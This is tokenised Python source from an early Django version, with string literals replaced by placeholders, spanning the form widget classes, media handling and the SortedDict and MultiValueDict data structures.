'<STR_LIT>' % ( opts . app_label , opts . module_name ) , func ) ( self , * args , ** kwargs ) <EOL> class Empty ( object ) : <EOL> pass <EOL> def model_unpickle ( model , attrs ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . query_utils import deferred_class_factory <EOL> cls = deferred_class_factory ( model , attrs ) <EOL> return cls . __new__ ( cls ) <EOL> model_unpickle . __safe_for_unpickle__ = True <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> def subclass_exception ( name , parent , unused ) : <EOL> return types . ClassType ( name , ( parent , ) , { } ) <EOL> else : <EOL> def subclass_exception ( name , parent , module ) : <EOL> return type ( name , ( parent , ) , { '<STR_LIT>' : module } ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import copy <EOL> from itertools import chain <EOL> from django . conf import settings <EOL> from django . utils . datastructures import MultiValueDict , MergeDict <EOL> from django . utils . html import escape , conditional_escape <EOL> from django . utils . translation import ugettext <EOL> from django . utils . encoding import StrAndUnicode , force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import datetime_safe <EOL> from datetime import time <EOL> from util import flatatt <EOL> from urlparse import urljoin <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Media ( StrAndUnicode ) : <EOL> def __init__ ( self , media = None , ** kwargs ) : <EOL> if media : <EOL> media_attrs = media . __dict__ <EOL> else : <EOL> media_attrs = kwargs <EOL> self . _css = { } <EOL> self . _js = [ ] <EOL> for name in MEDIA_TYPES : <EOL> getattr ( self , '<STR_LIT>' + name ) ( media_attrs . get ( name , None ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( chain ( * [ getattr ( self , '<STR_LIT>' + name ) ( ) for name in MEDIA_TYPES ] ) ) ) <EOL> def render_js ( self ) : <EOL> return [ u'<STR_LIT>' % self . absolute_path ( path ) for path in self . _js ] <EOL> def render_css ( self ) : <EOL> media = self . _css . keys ( ) <EOL> media . sort ( ) <EOL> return chain ( * [ <EOL> [ u'<STR_LIT>' % ( self . absolute_path ( path ) , medium ) <EOL> for path in self . _css [ medium ] ] <EOL> for medium in media ] ) <EOL> def absolute_path ( self , path ) : <EOL> if path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT:/>' ) : <EOL> return path <EOL> return urljoin ( settings . MEDIA_URL , path ) <EOL> def __getitem__ ( self , name ) : <EOL> "<STR_LIT>" <EOL> if name in MEDIA_TYPES : <EOL> return Media ( ** { str ( name ) : getattr ( self , '<STR_LIT:_>' + name ) } ) <EOL> raise KeyError ( '<STR_LIT>' % name ) <EOL> def add_js ( self , data ) : <EOL> if data : <EOL> self . _js . extend ( [ path for path in data if path not in self . _js ] ) <EOL> def add_css ( self , data ) : <EOL> if data : <EOL> for medium , paths in data . items ( ) : <EOL> self . _css . setdefault ( medium , [ ] ) . extend ( [ path for path in paths if path not in self . _css [ medium ] ] ) <EOL> def __add__ ( self , other ) : <EOL> combined = Media ( ) <EOL> for name in MEDIA_TYPES : <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( self , '<STR_LIT:_>' + name , None ) ) <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( other , '<STR_LIT:_>' + name , None ) ) <EOL> return combined <EOL> def media_property ( cls ) : <EOL> def _media ( self ) : <EOL> if hasattr ( super ( cls , self ) , '<STR_LIT>' ) : <EOL> base = super ( cls , self ) . media <EOL> else : <EOL> base = Media ( ) <EOL> definition = getattr ( cls , '<STR_LIT>' , None ) <EOL> if definition : <EOL> extend = getattr ( definition , '<STR_LIT>' , True ) <EOL> if extend : <EOL> if extend == True : <EOL> m = base <EOL> else : <EOL> m = Media ( ) <EOL> for medium in extend : <EOL> m = m + base [ medium ] <EOL> return m + Media ( definition ) <EOL> else : <EOL> return Media ( definition ) <EOL> else : <EOL> return base <EOL> return property ( _media ) <EOL> class MediaDefiningClass ( type ) : <EOL> "<STR_LIT>" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( MediaDefiningClass , cls ) . __new__ ( cls , name , bases , <EOL> attrs ) <EOL> if '<STR_LIT>' not in attrs : <EOL> new_class . media = media_property ( new_class ) <EOL> return new_class <EOL> class Widget ( object ) : <EOL> __metaclass__ = MediaDefiningClass <EOL> is_hidden = False <EOL> needs_multipart_form = False <EOL> def __init__ ( self , attrs = None ) : <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = copy . copy ( self ) <EOL> obj . attrs = self . attrs . copy ( ) <EOL> memo [ id ( self ) ] = obj <EOL> return obj <EOL> def render ( self , name , value , attrs = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def build_attrs ( self , extra_attrs = None , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> attrs = dict ( self . attrs , ** kwargs ) <EOL> if extra_attrs : <EOL> attrs . update ( extra_attrs ) <EOL> return attrs <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> """<STR_LIT>""" <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data_value = u'<STR_LIT>' <EOL> else : <EOL> data_value = data <EOL> if initial is None : <EOL> initial_value = u'<STR_LIT>' <EOL> else : <EOL> initial_value = initial <EOL> if force_unicode ( initial_value ) != force_unicode ( data_value ) : <EOL> return True <EOL> return False <EOL> def id_for_label ( self , id_ ) : <EOL> """<STR_LIT>""" <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class Input ( Widget ) : <EOL> """<STR_LIT>""" <EOL> input_type = None <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> if value != '<STR_LIT>' : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class TextInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> class PasswordInput ( Input ) : <EOL> input_type = '<STR_LIT:password>' <EOL> def __init__ ( self , attrs = None , render_value = True ) : <EOL> super ( PasswordInput , self ) . __init__ ( attrs ) <EOL> self . render_value = render_value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not self . render_value : value = None <EOL> return super ( PasswordInput , self ) . render ( name , value , attrs ) <EOL> class HiddenInput ( Input ) : <EOL> input_type = '<STR_LIT>' <EOL> is_hidden = True <EOL> class MultipleHiddenInput ( HiddenInput ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( MultipleHiddenInput , self ) . __init__ ( attrs ) <EOL> self . choices = choices <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( [ ( u'<STR_LIT>' % <EOL> flatatt ( dict ( value = force_unicode ( v ) , ** final_attrs ) ) ) <EOL> for v in value ] ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> class FileInput ( Input ) : <EOL> input_type = '<STR_LIT:file>' <EOL> needs_multipart_form = True <EOL> def render ( self , name , value , attrs = None ) : <EOL> return super ( FileInput , self ) . render ( name , None , attrs = attrs ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> "<STR_LIT>" <EOL> return files . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if data is None : <EOL> return False <EOL> return True <EOL> class Textarea ( Widget ) : <EOL> def __init__ ( self , attrs = None ) : <EOL> self . attrs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if attrs : <EOL> self . attrs . update ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> return mark_safe ( u'<STR_LIT>' % ( flatatt ( final_attrs ) , <EOL> conditional_escape ( force_unicode ( value ) ) ) ) <EOL> class DateInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_date ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( DateInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( DateInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class DateTimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateTimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_datetime ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( DateTimeInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( DateTimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class TimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( TimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( TimeInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( TimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class CheckboxInput ( Widget ) : <EOL> def __init__ ( self , attrs = None , check_test = bool ) : <EOL> super ( CheckboxInput , self ) . __init__ ( attrs ) <EOL> self . check_test = check_test <EOL> def render ( self , name , value , attrs = None ) : <EOL> final_attrs = self . build_attrs ( attrs , type = '<STR_LIT>' , name = name ) <EOL> try : <EOL> result = self . check_test ( value ) <EOL> except : <EOL> result = False <EOL> if result : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if value not in ( '<STR_LIT>' , True , False , None ) : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if name not in data : <EOL> return False <EOL> return super ( CheckboxInput , self ) . value_from_datadict ( data , files , name ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class Select ( Widget ) : <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( Select , self ) . __init__ ( attrs ) <EOL> self . choices = list ( choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , [ value ] ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def render_options ( self , choices , selected_choices ) : <EOL> def render_option ( option_value , option_label ) : <EOL> option_value = force_unicode ( option_value ) <EOL> selected_html = ( option_value in selected_choices ) and u'<STR_LIT>' or '<STR_LIT>' <EOL> return u'<STR_LIT>' % ( <EOL> escape ( option_value ) , selected_html , <EOL> conditional_escape ( force_unicode ( option_label ) ) ) <EOL> selected_choices = set ( [ force_unicode ( v ) for v in selected_choices ] ) <EOL> output = [ ] <EOL> for option_value , option_label in chain ( self . choices , choices ) : <EOL> if isinstance ( option_label , ( list , tuple ) ) : <EOL> output . append ( u'<STR_LIT>' % escape ( force_unicode ( option_value ) ) ) <EOL> for option in option_label : <EOL> output . append ( render_option ( * option ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> else : <EOL> output . append ( render_option ( option_value , option_label ) ) <EOL> return u'<STR_LIT:\n>' . join ( output ) <EOL> class NullBooleanSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> choices = ( ( u'<STR_LIT:1>' , ugettext ( '<STR_LIT>' ) ) , ( u'<STR_LIT:2>' , ugettext ( '<STR_LIT>' ) ) , ( u'<STR_LIT:3>' , ugettext ( '<STR_LIT>' ) ) ) <EOL> super ( NullBooleanSelect , self ) . __init__ ( attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> try : <EOL> value = { True : u'<STR_LIT:2>' , False : u'<STR_LIT:3>' , u'<STR_LIT:2>' : u'<STR_LIT:2>' , u'<STR_LIT:3>' : u'<STR_LIT:3>' } [ value ] <EOL> except KeyError : <EOL> value = u'<STR_LIT:1>' <EOL> return super ( NullBooleanSelect , self ) . render ( name , value , attrs , choices ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> value = data . get ( name , None ) <EOL> return { u'<STR_LIT:2>' : True , <EOL> True : True , <EOL> '<STR_LIT:True>' : True , <EOL> u'<STR_LIT:3>' : False , <EOL> '<STR_LIT:False>' : False , <EOL> False : False } . get ( value , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class SelectMultiple ( Select ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , value ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ ] <EOL> if data is None : <EOL> data = [ ] <EOL> if len ( initial ) != len ( data ) : <EOL> return True <EOL> for value1 , value2 in zip ( initial , data ) : <EOL> if force_unicode ( value1 ) != force_unicode ( value2 ) : <EOL> return True <EOL> return False <EOL> class RadioInput ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choice , index ) : <EOL> self . name , self . value = name , value <EOL> self . attrs = attrs <EOL> self . choice_value = force_unicode ( choice [ <NUM_LIT:0> ] ) <EOL> self . choice_label = force_unicode ( choice [ <NUM_LIT:1> ] ) <EOL> self . index = index <EOL> def __unicode__ ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> label_for = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> choice_label = conditional_escape ( force_unicode ( self . choice_label ) ) <EOL> return mark_safe ( u'<STR_LIT>' % ( label_for , self . tag ( ) , choice_label ) ) <EOL> def is_checked ( self ) : <EOL> return self . value == self . choice_value <EOL> def tag ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> final_attrs = dict ( self . attrs , type = '<STR_LIT>' , name = self . name , value = self . choice_value ) <EOL> if self . is_checked ( ) : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class RadioFieldRenderer ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choices ) : <EOL> self . name , self . value , self . attrs = name , value , attrs <EOL> self . choices = choices <EOL> def __iter__ ( self ) : <EOL> for i , choice in enumerate ( self . choices ) : <EOL> yield RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , i ) <EOL> def __getitem__ ( self , idx ) : <EOL> choice = self . choices [ idx ] <EOL> return RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , idx ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:\n>' . join ( [ u'<STR_LIT>' <EOL> % force_unicode ( w ) for w in self ] ) ) <EOL> class RadioSelect ( Select ) : <EOL> renderer = RadioFieldRenderer <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> renderer = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if renderer : <EOL> self . renderer = renderer <EOL> super ( RadioSelect , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_renderer ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if value is None : value = '<STR_LIT>' <EOL> str_value = force_unicode ( value ) <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> choices = list ( chain ( self . choices , choices ) ) <EOL> return self . renderer ( name , str_value , final_attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> return self . get_renderer ( name , value , attrs , choices ) . render ( ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class CheckboxSelectMultiple ( SelectMultiple ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> has_id = attrs and '<STR_LIT:id>' in attrs <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' ] <EOL> str_values = set ( [ force_unicode ( v ) for v in value ] ) <EOL> for i , ( option_value , option_label ) in enumerate ( chain ( self . choices , choices ) ) : <EOL> if has_id : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( attrs [ '<STR_LIT:id>' ] , i ) ) <EOL> label_for = u'<STR_LIT>' % final_attrs [ '<STR_LIT:id>' ] <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> cb = CheckboxInput ( final_attrs , check_test = lambda value : value in str_values ) <EOL> option_value = force_unicode ( option_value ) <EOL> rendered_cb = cb . render ( name , option_value ) <EOL> option_label = conditional_escape ( force_unicode ( option_label ) ) <EOL> output . append ( u'<STR_LIT>' % ( label_for , rendered_cb , option_label ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class MultiWidget ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , widgets , attrs = None ) : <EOL> self . widgets = [ isinstance ( w , type ) and w ( ) or w for w in widgets ] <EOL> super ( MultiWidget , self ) . __init__ ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not isinstance ( value , list ) : <EOL> value = self . decompress ( value ) <EOL> output = [ ] <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> id_ = final_attrs . get ( '<STR_LIT:id>' , None ) <EOL> for i , widget in enumerate ( self . widgets ) : <EOL> try : <EOL> widget_value = value [ i ] <EOL> except IndexError : <EOL> widget_value = None <EOL> if id_ : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( id_ , i ) ) <EOL> output . append ( widget . render ( name + '<STR_LIT>' % i , widget_value , final_attrs ) ) <EOL> return mark_safe ( self . format_output ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> return [ widget . value_from_datadict ( data , files , name + '<STR_LIT>' % i ) for i , widget in enumerate ( self . widgets ) ] <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ u'<STR_LIT>' for x in range ( <NUM_LIT:0> , len ( data ) ) ] <EOL> else : <EOL> if not isinstance ( initial , list ) : <EOL> initial = self . decompress ( initial ) <EOL> for widget , initial , data in zip ( self . widgets , initial , data ) : <EOL> if widget . _has_changed ( initial , data ) : <EOL> return True <EOL> return False <EOL> def format_output ( self , rendered_widgets ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( rendered_widgets ) <EOL> def decompress ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _get_media ( self ) : <EOL> "<STR_LIT>" <EOL> media = Media ( ) <EOL> for w in self . widgets : <EOL> media = media + w . media <EOL> return media <EOL> media = property ( _get_media ) <EOL> class SplitDateTimeWidget ( MultiWidget ) : <EOL> """<STR_LIT>""" <EOL> date_format = DateInput . format <EOL> time_format = TimeInput . format <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> if date_format : <EOL> self . date_format = date_format <EOL> if time_format : <EOL> self . time_format = time_format <EOL> widgets = ( DateInput ( attrs = attrs , format = self . date_format ) , <EOL> TimeInput ( attrs = attrs , format = self . time_format ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) <EOL> def decompress ( self , value ) : <EOL> if value : <EOL> return [ value . date ( ) , value . time ( ) . replace ( microsecond = <NUM_LIT:0> ) ] <EOL> return [ None , None ] <EOL> class SplitHiddenDateTimeWidget ( SplitDateTimeWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> widgets = ( HiddenInput ( attrs = attrs ) , HiddenInput ( attrs = attrs ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) </s>
<s> class MergeDict ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * dicts ) : <EOL> self . dicts = dicts <EOL> def __getitem__ ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> try : <EOL> return dict_ [ key ] <EOL> except KeyError : <EOL> pass <EOL> raise KeyError <EOL> def __copy__ ( self ) : <EOL> return self . __class__ ( * self . dicts ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def getlist ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> if key in dict_ . keys ( ) : <EOL> return dict_ . getlist ( key ) <EOL> return [ ] <EOL> def items ( self ) : <EOL> item_list = [ ] <EOL> for dict_ in self . dicts : <EOL> item_list . extend ( dict_ . items ( ) ) <EOL> return item_list <EOL> def has_key ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> if key in dict_ : <EOL> return True <EOL> return False <EOL> __contains__ = has_key <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __copy__ ( ) <EOL> class SortedDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> instance = super ( SortedDict , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> instance . keyOrder = [ ] <EOL> return instance <EOL> def __init__ ( self , data = None ) : <EOL> if data is None : <EOL> data = { } <EOL> super ( SortedDict , self ) . __init__ ( data ) <EOL> if isinstance ( data , dict ) : <EOL> self . keyOrder = data . keys ( ) <EOL> else : <EOL> self . keyOrder = [ ] <EOL> for key , value in data : <EOL> if key not in self . keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> from copy import deepcopy <EOL> return self . __class__ ( [ ( key , deepcopy ( value , memo ) ) <EOL> for key , value in self . iteritems ( ) ] ) <EOL> def __setitem__ ( self , key , value ) : <EOL> super ( SortedDict , self ) . __setitem__ ( key , value ) <EOL> if key not in self . keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> def __delitem__ ( self , key ) : <EOL> super ( SortedDict , self ) . __delitem__ ( key ) <EOL> self . keyOrder . remove ( key ) <EOL> def __iter__ ( self ) : <EOL> for k in self . keyOrder : <EOL> yield k <EOL> def pop ( self , k , * args ) : <EOL> result = super ( SortedDict , self ) . pop ( k , * args ) <EOL> try : <EOL> self . keyOrder . remove ( k ) <EOL> except ValueError : <EOL> pass <EOL> return result <EOL> def popitem ( self ) : <EOL> result = super ( SortedDict , self ) . popitem ( ) <EOL> self . keyOrder . remove ( result [ <NUM_LIT:0> ] ) <EOL> return result <EOL> def items ( self ) : <EOL> return zip ( self . keyOrder , self . values ( ) ) <EOL> def iteritems ( self ) : <EOL> for key in self . keyOrder : <EOL> yield key , super ( SortedDict , self ) . __getitem__ ( key ) <EOL> def keys ( self ) : <EOL> return self . keyOrder [ : ] <EOL> def iterkeys ( self ) : <EOL> return iter ( self . keyOrder ) <EOL> def values ( self ) : <EOL> return [ super ( SortedDict , self ) . __getitem__ ( k ) for k in self . keyOrder ] <EOL> def itervalues ( self ) : <EOL> for key in self . keyOrder : <EOL> yield super ( SortedDict , self ) . __getitem__ ( key ) <EOL> def update ( self , dict_ ) : <EOL> for k , v in dict_ . items ( ) : <EOL> self . __setitem__ ( k , v ) <EOL> def setdefault ( self , key , default ) : <EOL> if key not in self . keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> return super ( SortedDict , self ) . setdefault ( key , default ) <EOL> def value_for_index ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self [ self . keyOrder [ index ] ] <EOL> def insert ( self , index , key , value ) : <EOL> """<STR_LIT>""" <EOL> if key in self . keyOrder : <EOL> n = self . keyOrder . index ( key ) <EOL> del self . keyOrder [ n ] <EOL> if n < index : <EOL> index -= <NUM_LIT:1> <EOL> self . keyOrder . insert ( index , key ) <EOL> super ( SortedDict , self ) . __setitem__ ( key , value ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . __class__ ( self ) <EOL> obj . keyOrder = self . keyOrder [ : ] <EOL> return obj <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , v ) for k , v in self . items ( ) ] ) <EOL> def clear ( self ) : <EOL> super ( SortedDict , self ) . clear ( ) <EOL> self . keyOrder = [ ] <EOL> class MultiValueDictKeyError ( KeyError ) : <EOL> pass <EOL> class MultiValueDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , key_to_list_mapping = ( ) ) : <EOL> super ( MultiValueDict , self ) . __init__ ( key_to_list_mapping ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , <EOL> super ( MultiValueDict , self ) . __repr__ ( ) ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> list_ = super ( MultiValueDict , self ) . __getitem__ ( key ) <EOL> except KeyError : <EOL> raise MultiValueDictKeyError , "<STR_LIT>" % ( key , self ) <EOL> try : <EOL> return list_ [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> return [ ] <EOL> def __setitem__ ( self , key , value ) : <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , [ value ] ) <EOL> def __copy__ ( self ) : <EOL> return self . __class__ ( super ( MultiValueDict , self ) . items ( ) ) <EOL> def __deepcopy__ ( self , memo = None ) : <EOL> import copy <EOL> if memo is None : <EOL> memo = { } <EOL> result = self . __class__ ( ) <EOL> memo [ id ( self ) ] = result <EOL> for key , value in dict . items ( self ) : <EOL> dict . __setitem__ ( result , copy . deepcopy ( key , memo ) , <EOL> copy . deepcopy ( value , memo ) ) <EOL> return result <EOL> def __getstate__ ( self ) : <EOL> obj_dict = self . __dict__ . copy ( ) <EOL> obj_dict [ '<STR_LIT>' ] = dict ( [ ( k , self . getlist ( k ) ) for k in self ] ) <EOL> return obj_dict <EOL> def __setstate__ ( self , obj_dict ) : <EOL> data = obj_dict . pop ( '<STR_LIT>' , { } ) <EOL> for k , v in data . items ( ) : <EOL> self . setlist ( k , v ) <EOL> self . __dict__ . update ( obj_dict ) <EOL> def get ( self , key , default = None ) : <EOL> 